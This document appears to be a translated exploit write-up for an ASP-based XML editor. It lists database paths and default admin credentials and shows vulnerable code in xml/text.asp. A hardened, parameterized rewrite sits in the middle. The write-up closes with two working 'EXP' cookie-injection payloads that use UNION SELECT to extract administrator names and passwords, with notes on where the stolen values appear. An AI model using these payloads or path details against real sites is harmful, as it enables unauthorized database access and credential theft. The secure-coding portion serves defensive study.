Database path: xmlEditor/database/####@@@datas.mdb

Admin backend: xmleditor/login.asp   admin/admin

Guestbook database: guestbook/db/sywl.asp

File with the cookie injection vulnerability:

xml/text.asp

Code:

——————————————————————————

<!--#include file="../conn.asp"-->
<%
' conn.asp filters GET and POST input, but cookies are ignored
flowNo = Request("flowNo")    ' Request() reads more than just GET and POST!

If flowNo <> "" Then          ' continue only when flowNo is non-empty
    Set rs = Server.CreateObject("ADODB.RecordSet")
    rs.Source = "select * from xmlContent where flowNo=" & flowNo
    rs.Open rs.Source, conn, 1, 1

    ' XML output: the extracted data ends up inside the title element
    Response.Write "<?xml version='1.0' encoding='utf-8'?>" & chr(13)
    Response.Write "<main>" & chr(13)
    Response.Write "<title><![CDATA["
    Response.Write rs("tx")
    Response.Write "]]></title>" & chr(13)
    Response.Write "<text><![CDATA["
    Response.Write rs("description")
    Response.Write "]]></text>" & chr(13)

    rs.Close
    Set rs = Nothing
    conn.Close
    Set conn = Nothing
    Response.Write "</main>"
End If
%>
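The root cause in the handler above is that `Request("flowNo")` searches the cookie collection as well as the query string and form, so the filtering in conn.asp never sees the value, and the value is then concatenated straight into the SQL string. A hardened variant of the same handler, added here as an example (not the application's own code), reads only the query string, accepts nothing but a plain integer, and binds the value through an ADODB.Command parameter. Table and column names are taken from the code above; the `conn` object is assumed to be opened by conn.asp as in the original.

```asp
<!--#include file="../conn.asp"-->
<%
' Hardened text.asp (added example, not the application's own code).
' 1. Read from Request.QueryString only, never the collection-wide Request().
' 2. Accept only ASCII digits; anything else is rejected before SQL is built.
' 3. Bind the value as a parameter so no part of it is parsed as SQL.
Dim rawFlowNo, flowNo, cmd, rs

rawFlowNo = Trim(Request.QueryString("flowNo"))

If rawFlowNo <> "" Then
    ' IsNumeric alone accepts "1e3", "&H10" and similar, so check the digits explicitly
    If Len(rawFlowNo) > 9 Or Not IsDigitsOnly(rawFlowNo) Then
        Response.Status = "400 Bad Request"
        Response.End
    End If
    flowNo = CLng(rawFlowNo)

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1   ' adCmdText
    cmd.CommandText = "SELECT tx, description FROM xmlContent WHERE flowNo = ?"
    ' adInteger = 3, adParamInput = 1; size is not needed for an integer
    cmd.Parameters.Append cmd.CreateParameter("flowNo", 3, 1, , flowNo)

    Set rs = cmd.Execute

    Response.ContentType = "text/xml"
    Response.Write "<?xml version='1.0' encoding='utf-8'?>" & vbCrLf
    Response.Write "<main>" & vbCrLf
    If Not rs.EOF Then
        ' Stored content must not be able to close the CDATA section early
        Response.Write "<title><![CDATA[" & XmlSafe(rs("tx")) & "]]></title>" & vbCrLf
        Response.Write "<text><![CDATA[" & XmlSafe(rs("description")) & "]]></text>" & vbCrLf
    End If
    Response.Write "</main>"

    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
    conn.Close
    Set conn = Nothing
End If

' True only when s is non-empty and consists solely of ASCII digits 0-9
Function IsDigitsOnly(s)
    Dim i, c
    IsDigitsOnly = (Len(s) > 0)
    For i = 1 To Len(s)
        c = Asc(Mid(s, i, 1))
        If c < 48 Or c > 57 Then
            IsDigitsOnly = False
            Exit Function
        End If
    Next
End Function

' Splits any "]]>" in a value so it cannot terminate the enclosing CDATA section
Function XmlSafe(v)
    XmlSafe = Replace(v & "", "]]>", "]]]]><![CDATA[>")
End Function
%>
```

With the value bound as an integer parameter, a cookie or query value such as `14 union select ...` is rejected by the digit check before any query exists, and even a value that passed the check could only ever be compared as a number, never interpreted as SQL. The `Request.QueryString` change is the part that closes the gap conn.asp left: filtering GET and POST is pointless while the handler still reads from every collection.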

This cookie injection vulnerability also exists in new.asp in the root directory, but it is inconvenient to exploit there, and that page has a custom redirect to the home page. text.asp has no redirect of any kind, so it is convenient to exploit.

EXP:

javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminname from XmlAdmin"));

javascript:alert(document.cookie="flowNo="+escape("14 union select 1,2,3,adminpwd from XmlAdmin"));

PS: Note that the result of this EXP does not show up in the page body, which stays blank; the extracted account name and password appear in the title, that is, the page's title. Look carefully!